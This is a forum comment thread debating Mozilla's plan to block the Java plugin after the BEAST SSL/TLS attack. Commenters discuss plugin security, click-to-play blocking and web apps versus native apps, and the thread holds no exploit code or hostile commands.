[ceoyoyo]

That IS the problem with browsers. It's like allowing executable code in a data document - it's something that SHOULD be safe but isn't.

Further decrease market share

[Fujisawa+Sensei]

Way to further decrease market share. First start fuck with the versions numbering. Now blacklist java.

Keep taking the express elevator to the bottom, just like Netscape did.

Re:Further decrease market share

[j-stroy]

The constant forced upgrade cycles and confusing versioning in Firefox has left me with an unpleasantly different experience every time I upgrade. Not to mention gui redesigns and plug-in fails. So I don't upgrade.. and then when I do the upgrades fail and I can't roll-back without a re-install from what I can tell. The bitch is: it never gets stable, or shuts up about it.
In fact I've quit using it altogether for the first time Firefox was released. Now I use Safari wtf.

Umm... Flash?

[Tridus]

So they want to block Java over what is a difficult to execute attack that has some serious requirements to even use... but they continue to allow Flash with it's critical flaw of the week that's being actively exploited?

Is this a joke? Flash is the single largest attack vector on the entire fucking Internet.

Re:Umm... Flash?

[supersloshy]

Java isn't far behind, though, and it's rarely used for anything besides Runescape and the occasional application that was made before Flash was big. The danger here is that people have Java installed as a web plugin when it really, really doesn't need to be in most circumstances.

Re:Umm... Flash?

[cstdenis]

People use flash all the time. HTML 5 is on the way, but until it's issues (codecs, full screen, ads) are worked out flash is still the only common option for video on the web.

Java on the other hand, nobody cares about. Other than a few specialty applications or very old websites Java applets have long been dead.

Sun's early poor design decisions and the resulting horrible performance (nobody like their whole browser freezing for 30 seconds while an applet loads) killed it long ago. Modern Java has somewhat fixed those problems, but it's too little too late, everyone has long since moved on to Flash. Macromedia/Adobe may not know much about security, but they managed to get passable performance out of flash back when it mattered.

Re:Umm... Flash?

The thing is, this exploit isn't a Java exploit. It's funny that they used Java because there are a lot of better ways that don't require external plugins. Injecting <script> or <img> tags for instance do not have restrictions on same origin.

Re:Umm... Flash?

[dshk]

We are a small casual game site only, but we have a several hundred thousands regular user base, and we are using Java applets. No, it is not Runescape.

In the last ten years I only remember about two or three really critical Java exploits. Please show me a similar or even much simpler software with a security track better than Java.

I would add that this is a TLS vulnerability, it has almost nothing to do with Java. The exploit was written in Java, because it was comfortable. The authors mention on their YouTube video, that they could equally well use Javascript. I assume that they could have used Flash too.

Re:Umm... Flash?

[supersloshy]

That's true. Thanks for the response :)

Re:Umm... Flash?

[dveditz]

If there were "better" ways that didn't require a plugin they would have demoed that. Maybe there are such ways, but not through simple <script> or <img> tags. In some ways I wish that is what they used: we could have fixed that ourselves rather than being at the mercy of plugin vendors.

Spyware, too

[bigtrike]

Spyware/malware used to be much more of a pain because you had to download and trust a large number of applications to do much with your computer. Many user's needs are sandboxed into webapps these days, preventing a lot of issues.

Re:Stop trying to make the browser more than it is

[ceoyoyo]

Meh. If your application is primarily presenting a UI then a web app isn't such a bad solution. For applications that actually do something, most of the work is behind the scenes. If it's Desktop only write it in Python or the like and you've suddenly got the entire desktop/notebook market finished. If you want it to run on a phone or tablet (and it SHOULDN'T run on both a phone and a desktop) then write it in C and slap Android and iOS UIs on it.

Re:Stop trying to make the browser more than it is

[Lisandro]

PyObjC. It's completely doable.

And even then, it is not the desired target. If you use the right tools for each platform it gets way easer; Java paves and easy road for porting between desktops, Android, iOS, Chrome and Blackberry, for example.

Microsoft has ended support for J#

[tepples]

A Java application does not run on Windows Phone 7. Only web applications and applications written in verifiably type-safe .NET languages work on Windows Phone 7, and Microsoft has ended support for J# as far as I know. Python doesn't work on a lot of these more locked-down platforms either: it and other DLR languages require Reflection.Emit, which isn't present on a lot of the minimal CLRs. Nor will Java or Python help you get Sony or Nintendo to approve your application for execution on a PSP, PS3, PSVita, DSi, Wii, or 3DS, all of which come with a web browser or have one available for download at no charge.

Re:Microsoft has ended support for J#

[Lisandro]

Agreed, but then again, there's no magical solution for porting. There are great tools that ease the process though, in pretty much any platform and technology you'd like.

The fact that porting requires work shouldn't be an excuse to turn web browsers into fancy VMs.

Re:Microsoft has ended support for J#

[dingen]

The fact that porting requires work shouldn't be an excuse to turn web browsers into fancy VMs.

Why not? Isn't it about getting your application to as many people as possible, with the least amount of effort?

Re:Stop trying to make the browser more than it is

[tepples]

If you need to provide your users with application-like behavior, then just write a native application!

Give me a solid workaround for each of these problems and I'll agree with you:

• Unlike native applications made for Windows, web applications work on Macintosh computers and PCs running Linux. (Workaround: Qt)
• Unlike native applications made for PCs, web applications work on video game consoles and smartphones. (Workaround: ?)
• Unlike native applications, web applications can be used by limited users who have no privileges to install applications on a machine. (Workaround: ?)

Not blocked, but click to play

[kangsterizer]

Quoting decoder from the security team:

"It should be "click to play" by default, which means you have to click on the applet for it to be activated and loaded. "Disabled" might have been the wrong term here, but until you click the applet, nothing can happen."

That's what Chrome does also. Then again in theory, flash should also be click to play. Except flash is used everywhere and its going to piss people off, so its not click to play, either in Chrome. In fact, all plugins should be click to play with a white list of auto play sites that the user can configure. Yeah, Noscript.

Still, I'd prefer default click to play in java.

Re:Not blocked, but click to play

[sgt+scrub]

A large portion of their user base installs a flash blocker that allows them to decide if they want to view a flash file or not. I don't get why they don't pick up on these things. Having the functionality in the browser is great. Having the ability to make a decision is even better.

Re:Not blocked, but click to play

[kangsterizer]

I suppose its something like "if its technical itll confuse people"
"also if its technical, tech people will install the addon and get the feature so its ok"

that's probably for the very reason i cited above, click to play flash would alienate most users. click to play java is ok, but thats just because there aren't many java applets, nothing else!

so in the end its a very delicate choice

Re:Not blocked, but click to play

[KiloByte]

This is what Flashblock does, and I don't imagine browsing without it if you need flash.

Re:Not blocked, but click to play

[bill_mcgonigle]

I don't get why they don't pick up on these things.I don't get why they don't pick up on these things.

They have all the metrics from addons.mozilla.org. They choose to ignore the wisdom of their masses and try to centrally plan the direction browsers should take. See TFS for how well this works out. See also Firefox v183.

Re:Not blocked, but click to play

[OdinOdin_]

Yes lets have "click to play" for all plugins that would be great. A user definable option plugin-by-plugin.

Also when there is 1 or more items in a web page that require click to play lets also have an user preference option for a drop-down bar to appear (the bar that sometimes appears due to popup blocking and file downloading at the top of the main web-page area).

This feature would be a great addition to Firefox and would show no discrimation towards Java in particular, then I could disable Flash by default as well!

Re:Not blocked, but click to play

[sgt+scrub]

See also Firefox v183

Is it 2012 already?

Re:Not blocked, but click to play

[pterry]

In fact, all plugins should be click to play with a white list of auto play sites that the user can configure.

That's exactly what Chrome does for me since I enabled it. Go to chrome://flags/ and enable Click to play, then go to chrome://settings/content and set Plug-ins to Click to Play. There's also a blacklist / whitelist you can configure. Why this option is "experimental" I have no idea.

Re:Stop trying to make the browser more than it is

[Pieroxy]

Ajax conforms to the HTTP protocol pretty much like everything else. It is an http request sent by the browser basically indistinguishable from another regular http request to get an image or an html file. Nothing was done in the HTTP protocol for AJAX. What are you talking about exactly?

Re:Stop trying to make the browser more than it is

[dingen]

WebSocket is developed to shine where HTTP fails. It's not yet ready for the masses, but Firefox 4, Opera, Chrome and Safari already have some support. WebSocket will make Ajax and polling in general a thing of the past, enabling even more application-like behaviour in your browser.

The first applet is slower

[tepples]

Java is slow for the first applet you view in a browser session. After that, the important class libraries are already in RAM, and further applets load just as fast as, say, SWF objects.

Re:The first applet is slower

[Lisandro]

Which means that Java is no longer slow by then. Only the rest of your system :)

Re:Stop trying to make the browser more than it is

[maxume]

You can bundle a python interpreter and app up so that installation and execution are the same as any other app.

Makes for a larger install package, but that's about it.

How to prove one has the smarts to know better?

[tepples]

we have to make sure there are safeguards in place like [...] maybe requiring approval for plugin installation from someone with the smarts to know better than to install [a trojan disguised as a video player component]

So how would a more knowledgeable PC owner prove he has "the smarts to know better" in order to approve a plugin installation?

Re:How to prove one has the smarts to know better?

[djdanlib]

That's the million dollar question, isn't it?

Every PC owner believes they are entitled to do as they please with their PC. More people think they are knowledgeable than actually are knowledgeable, and I'm not saying I'm exempt either.

Same with car owners, except car owners need to get inspected and will get pulled over if they have something truly obviously broken. Why? It affects other people. Same with PC malware - it affects other people! Your PC might be used to buy/trade my identity, attack my company's networks, or spam my email, without your knowledge. So I really am starting to lean towards having an "Internet drivers' license" and regulating the equipment...

Re:How to prove one has the smarts to know better?

[tepples]

What actions would require the advanced privileges that come with such a "driver's license"? Would you restrict the ability to install software not digitally signed by an accredited business? Would you restrict the ability to compile software? How would that affect high school students doing their homework for an introduction to programming class?

Re:How to prove one has the smarts to know better?

[djdanlib]

This comes up every now and again, but it's totally moot because things are too far gone. If they'd implemented in the early 90's, then it would be possible. The existing userbase is just too big now. So, awareness needs to be promoted more than my futile agenda of mandatory proving-that-you-can-be-a-responsible-user.

Digital signing seems to get compromised regularly, so that's out. I'm not a fan of censorship anyway, so let's not give regulators that kind of power over what you can and can't have - it needs to be a switch. You can put this PC online, it passes the safety and integrity check (no bots are opening ports), and you can go online, you have the license.

I'd say that the license would only allow you access to the Internet. Without it, you wouldn't have access. You'd still be free to do as you please except that you couldn't go online. Just like private property - I believe you should be able to drive a tractor or truck around on your own farm, no matter what, as long as you accept that there are risks to doing that with equipment that rarely or never gets a full inspection.

Restricting compilation wouldn't be good, neither would restricting interpreted bytecode. Again, that is a censorship issue. How would you even begin to restrict it? Based upon some patterns in the code? Require a license? But then what about javascript, vbscript, shell scripts? Java, .NET? Flash? It's not really feasible.

Then you get into dicey territory. What happens if someone sneaks on, or otherwise does something that's supposed to be restricted by not having the license? Is there a penalty? Is it a crime? I don't know.

I haven't thought it all the way through yet, I guess, but I'm satisfied just to promote responsibility.

Re:Stop trying to make the browser more than it is

[w_dragon]

He's probably talking about things like how the browser/web server create a new TCP session for each and every AJAX request, even if they're going to happen every few seconds for as long as you're on a page. Google gets around this by setting some silly-long keep-alive on the TCP connection for the original page request on pages like gmail so the first few AJAX requests at least don't take the extra overhead.

No ETA for a fix

[tgeek]

I guess that means they haven't decided if it should go in the version 8 due after lunch, version 9 tomorrow morning, or version X next Tuesday . . .

SSL man in the middle

[tepples]

The attacker must be a man-in-the-middle

The server's ISP is a man-in-the-middle. The operator of a national firewall is a man-in-the-middle. This is not unlike what Perspectives calls the "Lserver attack".

Re:SSL man in the middle

[Astatine]

...anyone sharing a public WiFi with you can be a man-in-the-middle...

Re:Stop trying to make the browser more than it is

[Lisandro]

I'm talking the fact that you need to execute an HTML call in scripting language inside the same browse to retrieve HTML content which most of the times requires a framework tool in order to be reprocessed and inserted into the main pages' DOM. It's a (very ugly) workaround for the fact that HTML is was designed as a one-way method of comunication - static content.

Re:Stop trying to make the browser more than it is

[Pieroxy]

But this is just a lack of optimization on the part of the browsers... It'll come in time. But it is not an "atrocity" like the GP was saying...

If it's about mistuned servers

[tepples]

So it appears someone's core complaint about AJAX is that a lot of AJAX sites are run on mistuned servers whose default keep-alive time is too short for AJAX. If the problem is with the TCP keep-alive mechanism, wouldn't a connection-oriented protocol have exactly the same problem?

Firefox 7 delayed

[RStonR]

Mozilla-Foundation failed again: (sorry, in German) http://www.heise.de/newsticker/meldung/Update-auf-Firefox-7-verschoben-1351616.html There are also desperate cries for a fork: http://in-other-news.com/2011/The_problem_with_Firefox_and_how_it_could_be_fixed

Application logic in which language?

[tepples]

So do the sensible thing and have several native implementations.

Ideally, these native implementations should be able to share the same application logic, just with a different front-end per platform. This way, if I fix a defect in the application logic, it's fixed across all ports. This is one advantage of separating model and view layers. But apart from JavaScript in a web browser, is there a single programming language that can be used on Windows, Mac OS X, desktop Linux, iOS, Android, WebOS, ChromeOS, BlackBerry OS, and Windows Phone 7, in which to write this application logic?

Re:Used for Games, apps, and several websites

[gilleain]

Nope, pretty much all board game apps require Java, many bank websites, etc require this. I'm not saying they should, just saying they do.

That may change in the near future. In my area, applets are often used for simple chemical structure editors, but there are some commercial and free/open-source javascript solutions for this. Even 3D molecular viewers, like twirlymol:

http://baoilleach.blogspot.com/2009/01/twistymol-is-dead-long-live-twirlymol.html

There are many advantages, such as better page integration, no startup time, no "install java" popup, etc.

Re:Stop trying to make the browser more than it is

[cavreader]

Today's computing ecosystem is still to volatile to guarantee perfect security whether you build from the ground up or apply endless patches and updates. Look at the number of permutations of Operating Systems, OS Versions, OS Security Patch Levels, OS Bug Patch Levels,Hardware platforms, and custom Applications. It's amazing anything works or is even half way secure especially when you introduce user actions into the mix.

Re:Stop trying to make the browser more than it is

[Lisandro]

No. The parent poster raises a nice point regarding TCP sockets and how they're handled to provide "instant" UI response. Google does it beautifuly but it requires a crapload of work and testing in order to get it right, not to mention it basically (again!) abuses a TCP feature intended for a completely different thing.

The problem is not Java

[nweaver]

The problem is NOT java, the problem is SSL/TLS. Java was just the vector which was used to exploit this, and disabling Java doesn't disable the real problem, especially since Mozilla refuses to support TLS 1.1.

Its also unclear in the press how the Java same origin bypass worked for this test: Was it click to install or a real flaw? As a tool author (Netalyzr [berkeley.edu]), being able to bypass same origin without a signature dialog would be a big deal in improving the quality of our tool.

Re:The problem is not Java

[Bovius]

The problem is NOT java, the problem is SSL/TLS. Java was just the vector which was used to exploit this, and disabling Java doesn't disable the real problem, especially since Mozilla refuses to support TLS 1.1.

What really shocks me is that this is the lead developers of Firefox recommending this solution. I just kind of assumed they would address the SSL/TLS issue instead of the particular implementation flavor the researchers chose.

Re:The problem is not Java

[bill_mcgonigle]

Quick, somebody code up this exploit in Flash so Mozilla is forced to make the proper fixes, instead of blaming the kid they don't like.

Re:The problem is not Java

It doesn't surprise me. Why go to the trouble of implementing TLS 1.1 and TLS 1.2 when you can force someone else to fix the problem with their software so that you can focus your efforts somewhere else (despite the fact that Java only presents one vector, the discoverer of the flaw has even pointed that out)? In Firefox's case, they are short staffed when it comes to implementing TLS, because all of their staff is tied up in making changes to the UI (excuse me, UX) and the rapid release.

Re:The problem is not Java

[thue]

According to the article:

"For Friday's implementation of BEAST to work, Duong and Rizzo had to subvert a safety mechanism built into the web known as the same-origin policy, which dictates that data set by one internet domain can't be read or modified by a different address."

"The researchers settled on a Java applet as their means to bypass SOP, leading Firefox developers to discuss blocking the framework in a future version of the browser."

So it sounds like there are two security bugs. One in TLS, and one in Java.

Re:The problem is not Java

[briansmith]

No matter what we do to the browser's TLS implementation, this attack would still be possible via Java, because Java has its own TLS implementation.

We are already working on proactively mitigating any improvements on the BEAST attack that could be made to work using native browser features that would be affected by changes to our TLS implementation. But, right now, there are no known ways to implement the attack using built-in browser features.

Re:Stop trying to make the browser more than it is

[Pieroxy]

But there are simple solutions for that problem. The fact that Chrome abuses some TCP feature is a Chrome problem, not an AJAX one. Nothing prevents a browser to set a keep alive in the HTTP headers and let a socket open to the server. This is an existing feature of HTTP, respect perfectly TCP, and was even designed for that very purpose !

I have to say I'm not familiar with that specific subject, but I fail to see a problem there.

I hope they don't over react

[sgt+scrub]

The reaction to XUL pages on the web was horrible, "just drop support". I hope they bring it back and warn the user about the dangers on a site by site basis with both instead of dropping support.

Re:Stop trying to make the browser more than it is

[Pieroxy]

Not to mention the original poster wasn't talking about that at all. He finally answered and his grudge is against HTML and JavaScript... ;-)

Re:Stop trying to make the browser more than it is

[dingen]

The difference is that even though people complain about a lack of compatibility between the browsers, the differences are in fact very minor when compared to the differences between operating systems.

The main concern are old browsers, they are a nuisance. Modern browsers behave surprisingly alike.

Re:Stop trying to make the browser more than it is

[Pieroxy]

It all depends how you use AJAX I guess.

I use it to submit forms, so that I avoid the problem of having to refresh a page in which a user has made some input. In this regard, I save time and energy, and the user has a faster response. It's all a win.

I also use it to refresh some components in html pages. No DOM is needed there as it is as easily done by grabbing an HTML fragment from the AJAX request and putting wherever you need with the innerHTML attribute. Again, it saves bandwidth and time to code. Another win.

AJAX is a powerful tool that may need some tooling for some. Interpreting a JSON response is a one liner for example. No kludge in there. Manipulating the DOM is something very powerful too, but again it may need some tooling for some.

All in all, yes, browsers were once made to display static content. That was before DOM-based browsers. Things have changed.

This just doesn't apply to firefox

[Synerg1y]

This applies to firefox, IE, chrome and every other browser. The exploit they're talking about attacks SSL not the browser, The java required is javascript, not a full blown java applet. The hacker would of course have to intercept your traffic, so a backdoor kind of spyware / malware program is required, or a virus, but the whole point is https just got a lot less safe, especially on infected computers.

Re:Used for Games, apps, and several websites

[gilleain]

Ooh. For an impressive commercial option, consider 3D zeolites with WebGL :

http://web.chemdoodle.com/demos/iza-zeolite-explorer

(May require ffx or chrome, doesn't load in safari)

Re:Stop trying to make the browser more than it is

[Lisandro]

The feature is abused by AJAX which depends on long TCP sessions. I mentioned Google because its online apps usually implement this very well (from the UI point of view, at least).

Re:"Home offices are not secure" -- Nintendo

[Lisandro]

So the solution to Nintendo pissing over homebrew developers is turn every single game into web apps?

Re:Stop trying to make the browser more than it is

[Lisandro]

I hate JS :), but that is beyond the point. Do you realize the amount of work and back-and-forths you need to do only to perform an action when you click on something on a page?

MozDev's can solve all problems

[inject_hotmail.com]

So, I propose a solution to the bank robbing problem. Let's seal all the doors and windows of every bank with 3" steal.

Alternatively, we can remove all banks.

See...problem solved.

Re:Stop trying to make the browser more than it is

[Lisandro]

Exactly - this is was i was talking about. A true full-duplex web protocol would be a godsend. Thanks!

Compare WiiCade

[tepples]

It was the accepted workaround back in the days of WiiCade before the Twilight Hack appeared.

Blame the right people

The bad part about this entire debacle is that this exploit has been a theory for something like 6 years and no one saw fit to fix the problem. Now suddenly blame is getting aimed at people who are not at fault. The real fix for this whole thing is to update and use TLS 1.1 or 1.2 yet everyone kept whining about the expense to do that and suddenly here we are. Its too expensive to fix things the correct way since we wasted 6 years of potential amortization of the expense so everyone is scrambling to patch something that isn't even their responsibility in the first place. In the meantime we the end users are the ones being screwed over, its our PayPal and bank credentials at risk. It may not be legally sound but I honestly feel the server owners that have failed to upgrade should be subject to liability and lawsuits for allowing potentially damaging activities and code that were known to continue to function.

Why not try removing Java?

[ThePhilips]

My home PC runs without Java for 5 or 6 years now. On office PC, Java in browser is disabled.

The biggest problem I have encountered in all the years are the error messages with freshly installed OO.o/LibreOffice starts. (But I heard LO is fixing that.)

Re:Why not try removing Java?

[Hentes]

Removing Java completely because you don't want to play applets seems like an overkill to me.

you're doing it wrong

[Thud457]

you should be looking for Lindsey_Lohan_nude.jpg.exe, that's why you're not finding it

Re:Different implementations for different platfor

[Chibi+Merrow]

Or I can keep the application logic on my own damn box and have you access it via a web front end. Single Model and Controller, and maybe just a couple of Views (due to mobile browser limitations).

For the average application and the average user, web-style apps are going to be the only thing that makes sense going forward. Not talking CAD here, but 99% of the other applications people use on a daily basis.

The idea of ever running an actual mail client again, for instance, is a completely alien concept to me.

Java has a socially engineered stigma

[bl8n8r]

Microsoft wanted to kill java back in the 90's and the only way they could do it was with FUD. This is the biggest reason Java got such a bad rap. Looks like most of you were too young to remember though.

" Sun said Microsoft was trying to undermine the credibility of the
Java language by presenting a crippled brand of Java applications that
run only on the Windows platform. "

http://www.ibiblio.org/pjones/jomc191-97/talk/msg00064.html

Re:Java has a socially engineered stigma

[RogerWilco]

I am old enough to remember. But as far as I'm concerned, Java is a nice language for some serverside tasks, but still horrible for anything that needs to interact with users, unless you completely write your own UI. Swing is horrible, SWT is kind of ok-ish for some office type applications but still limited.

And any Java application I have used, has glitches in the GUI, moments where it just stops responding for a few seconds, laggy responses to user input.

The only user oriented Java application that sofar has been able to impress me is Minecraft.

Re:Java has a socially engineered stigma

[peppepz]

What about Android?

Re:Java has a socially engineered stigma

[shutdown+-p+now]

Ironically, the "crippled brand" of applications ran better than the non-crippled ones, because MS JVM was the fastest VM back then (faster than anything Sun had), and the "crippled" part came from the use of Win32-specific UI library (WCF), which, coincidentally, was much faster than either Swing or AWT.

mozilla

[perryizgr8]

nobody cares what firefox and mozilla guys think anymore. these are the fuckers who took the most awesome browser in existence and ruined it into something worse than ie.

We've been uninstalling Java for some time now

[markdowling]

We only leave it on machines that MUST access websites which are require an applet or a Java executable to run.

Re:Stop trying to make the browser more than it is

[Lisandro]

DOM based browsers still display static content :) They just make it easy for you to modify content afterwards its been served.

Someone below mentioned websockets - check it for a good overview of a proper full-duplex protocol which would solve most of these issues i've been mentioning.

Chrome "uncommon" plugin policy

[Sits]

As you mentioned Chrome makes all uncommon plugins click to play by default (you can even see an explicit note about this on the Java website.

For what it's worth Chrome has a general click to play feature but you need to enable it in chrome://flags/ , restart and then enable the newly available option in the general plugin preferences.

Protection is already available

[geekprime]

I have been using noscript http://noscript.net/ for years. Paste from thier page,
----------------------
The NoScript Firefox extension provides extra protection for Firefox, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScript, Java and Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful Anti-XSS protection available in a browser.

NoScript's unique whitelist based pre-emptive script blocking approach prevents exploitation of security vulnerabilities (known and even not known yet!) with no loss of functionality...

You can enable JavaScript, Java and plugin execution for sites you trust with a simple left-click on the NoScript status bar icon (look at the picture), or using the contextual menu, for easier operation in popup statusbar-less windows.
----------------------

I have always thought that a white list approach was the best for anything as powerful as java & javascript, either one is essentially running someone else's unknown programs on your machine there may be a "sandbox" now but I really don't know how secure that is either

Re:Protection is already available

[syockit]

NoScript is pretty much the reason why I'm still on Firefox. While other browsers have started including Javascript whitelists, they still don't have this powerful feature of NoScript: the ABE.

Re:Protection is already available

[mzs]

noscript won't really do it because it's a MITM attack. If you whitelist a site then an attacker can inject an evil jar file (currently js used for this) that steals session cookies. Something that would work would be if the cookie monster extension would be modified such that no cookies would be passed along any connection from an applet, or maybe even better any plugin. Or you could limit it so only certain sites cookies to certain other sites as well? Maybe it already does this?

Voiding an unrelated warranty

[tepples]

The trouble with that is that a lot of hardware manufacturers will void the hardware warranty if the owner opens the case even if the owner subsequently sets the jumper back to how it was.

Writing's on the wall

[BeforeCoffee]

Sigh ... I wondered when the Java plugin was finally going to poop out on us design-wise. Darn thing is so creaky and stuck in web 1.0-mode. Maybe it's time to port CardMeeting to HTML5...

Good riddance

[JDG1980]

About two and a half years ago, my home PC got rooted by a drive-by exploit that took advantage of a Java security hole. After wiping and rebuilding, I didn't install the Java plugin. Guess what? In those two and a half years, I never once have come across a site that really needs it. One site I occasionally read has animated buttons that are supposed to use Java, but not having the plugin just means that you see the alt text instead. And that's one single site. 99.9% of the time, not having the Java plugin means nothing changes.
The average user should not have Java installed.

When asked for comment on this idea...

[AdamJS]

...an eager IBM official responded with one word: "Rofl."

QuickJava

[Hohlraum]

Doesn't everyone use QuickJava? Allows you to quickly enable/disable the java plugin from the add-on bar.

On-demand flash didn't piss me off

[Hentes]

In Opera it works this way for all plugins including flash. It's not inconvenient, in fact it's very comfortable that I don't have to mess around with adblocking anymore. I whitelisted sites like youtube that require flash extensively and some of the rare sites that would break otherwise, and then it works like a charm.

You have source code for java plugin?

[lindi]

Hmm, can you give a link to the source code? Afaik we don't have source code to the sun java plugin. Openjdk's java plugin is a completely different project and does not work on many sites that are only tested with sun java.

Re:You have source code for java plugin?

[causality]

Hmm, can you give a link to the source code? Afaik we don't have source code to the sun java plugin. Openjdk's java plugin is a completely different project and does not work on many sites that are only tested with sun java.

No, I am using Sun's Java. On Gentoo the package is called "sun-jdk" and it includes the runtimes (there is also "sun-jre-bin" for the runtimes only, but I occasionally need the jdk what with this being a source-based distro... point is both have this nsplugin flag). Perhaps I should have said the more generic "install from upstream" rather than "compile from source". I'd have caught that if the subject were say, software freedom or a desire to modify the runtimes. In the context the actual availability of source code seemed like a useless technicality to me, as it had nothing to do with trying to help you realize you do in fact have an option regarding the browser plugin, though you are in fact correct.

At any rate, installing from upstream allows for this flexibility whereas the packages (.deb, .rpm, whatever) as provided from your distribution apparently have to make an assumption, according to your first post. That kind of fine-grained customization is a major reason why one would run a source-based distro in the first place. The nature of a binary distro means fewer options like this because assumptions like that have to be made by whoever builds everything for you. Generally they assume you will always disable or just won't use whatever you don't like so they tend to include everything and the kitchen sink. That's much easier for them than maintaining multiple versions of the same package, each with different build-time options.

Of course your disadvantage here is that you may have to install it outside of your package manager, which sucks.

Minimum age for such a driver's license

[tepples]

I'd say that the license would only allow you access to the Internet. Without it, you wouldn't have access. You'd still be free to do as you please except that you couldn't go online.

Which would hurt PBSKids.org, NickJr.com, and other web sites targeted to children who are too young to operate a motor vehicle.

Re:Minimum age for such a driver's license

[thejynxed]

Children should be outside playing and learning to socialize with their peers, not sitting in front of a computer screen ruining their eyesight and getting carpal tunnel syndrome (aka basement dweller syndrome).

I have a hard enough time limiting console and television use for my son (as do most parents I personally know), the "internet" is right out until he is older and can handle the responsibility.

In either event, use of a computer by children should be strictly monitored. Hell, I know plenty of adults who deserve that same kind of strict supervision. I often wonder how they circumvent Darwin's Law.

Re:Stop trying to make the browser more than it is

[theArtificial]

Do you realize the amount of work and back-and-forths you need to do only to perform an action when you click on something on a page?

Good morning and yes. What's your point, that it's simpler to do it without? It's not set in stone that you need to do it this way, it's merely another option with pros and cons. Alternatively you may use a traditional POST. The caveat is the entire page is reloaded which is often unnecessary, one often only needs to update specific information on the page like an image or a text field. This is more of an architectural issue. If you want a pre-2000s website you may stick with the POSTs however a great many people tend to like the interactivity which JS provides on top of HTML - look at the popularity of Google's web offerings.

Do you realize the amount of work spent cross browser testing (and the back and forths with CSS)? Or do you know how much back-and-forth is required with traditional desktop development? For example look how much cruft is involved handling windows messages when creating a Windows application for say an OpenGL project.

RAID

[tepples]

I bought a hard drive from Seagate with a five-year warranty. It's year two and I've been through four drives.

At least you have drives. If the warranty were voided, you'd have to spend money on a replacement now instead of later.

What's the point of a hard drive that doesn't retain data?

As half of a pair in RAID 1 or RAID 10.

Re:Stop trying to make the browser more than it is

[lahvak]

I do not see any difference, from security standpoint, between a browser based application and a "native" application. Both of them have to be downloaded from somewhere, and executed on the local computer. The only difference is that browser based applications are easier to download and run, so it is more likely that a moron will run a malicious program if it is browser based.

Re:Stop trying to make the browser more than it is

[Lisandro]

This is more of an architectural issue....

Which is exactly my point, and the point of the grandparent poster. HTML is, today, a kludge of patches over a technology that was originally built for a very different purpose. Again, someone mentioned websockets, which is (luckily) a right step torwards a modern, redesigned web protocol.

Re:Stop trying to make the browser more than it is

[dingen]

It's not really that much work. Just assign an event to the clicking of the something, make it do an Ajax-request to something on your server, let the server process the input, have it send back some output and then use that output to change something on your page. I fail to see how this is significantly more work than to do the exact same thing without Ajax.

Re:Stop trying to make the browser more than it is

[phantomfive]

Web browsers are good for viewing static documents, especially ones that link to other static documents.

That battle was lost a decade ago. Web apps are here, and not going anywhere.

Re:They should blacklist old Java and Flash/Reader

[peppepz]

Oracle really need to improve their Java plugin update mechanism. It's not user friendly at all, on Windows it triggers an UAC prompt before displaying any dialog box, and users have to explicitly start the update by clicking a balloon on the system tray before it disappears after a few seconds. Most of them won't do it, because they have no idea of what a "Java" is. After it's started, the update process happens on the foreground, and displays a series of dialog boxes that the user has to click through, annoying him and interfering with his work.

In my opinion, "consumer" Java should update itself automatically and quietly in the background, as Chrome does. Enterprise users that, for some reason, rely on a specific release of the JRE, will most probably want to have Java's self-update feature disabled anyway.

Javascript too

[dshk]

They also wrote that they could have used Javascript as well, and even call for a Javascript version.

Bug report says the problem is Java

[chrb]

According to the Mozilla bug report, this problem actually is Java - specifically, the Java implementation of TLS. NSS, the TLS library used by Firefox and Chrome, has already been patched by Google engineers. The question is whether Firefox should block Java applets to protect users, or continue allowing Java applets, in which case Firefox users can still be exploited until Oracle comes out with a fix for Java.

Re:Oracle

[Medievalist]

Well, Oracle reacting quickly to this sort of thing is about as likely as five useful Java applications being able to co-exist peacefully on a user desktop.

I mean, sure, it's theoretically possible.

Why is javascript required?

[WaffleMonster]

There are a million different ways to get a browser to issue a known plaintext request to a server. I understand javascript is needed for this specific implementation however what is to prevent a different implementation from using an image tag, css, redirect headers, media objects..etc to issue the same request? Why is javascript required?

Theoretically?

[dshk]

I had exactly 5 running Java applications 2 minutes ago, but since then I closed one after I won that chess match.

OK, one is not an application but an Apache Tomcat server I use for development.

Re:Theoretically?

[Medievalist]

OK, as long as you consider a Java chess application "useful" (which I don't, but it's clearly a matter of taste) then it's not just theoretically possible, it's actually possible!

Personally, though, I can't run even four useful Java apps without my computer acting up. I can run a couple hundred compiled C applications simultaneously without any problems.

Re:Theoretically?

[dshk]

Yes, that is true, a small C application requires much less memory than a small Java. On the plus side it does not require much more memory even after it starts to serve ten thousands users.

By the way the Java apps open: an IDE, a text editor, a personal time keeper, an app server. Occassionally a casual game. The biggest memory hog on my machine is Opera, which was - as I know - written in C.

Re:Say what!

[dveditz]

Mozilla is working on a short-term patch to TLS that will prevent the attack in the browser (see the bug), and in the longer term will implement TLS 1.2 (but if you don't prevent TLS downgrades you haven't fixed anything, and if you do you break all the version-intolerant servers out there).

No browser fix can prevent this attack from using a vulnerable plugin such as Java since Java is making these network requests on its own. Either the plugin vendor issues a fix, or you fix it by disabling the plugin.

Re:Different implementations for different platfor

[Chibi+Merrow]

Well I never trusted e-mail for anything important, anyway. :)

All my friends are dead

[DrSkwid]

"Not only is UNIX dead, it's starting to smell really bad." - Rob Pike circa 1991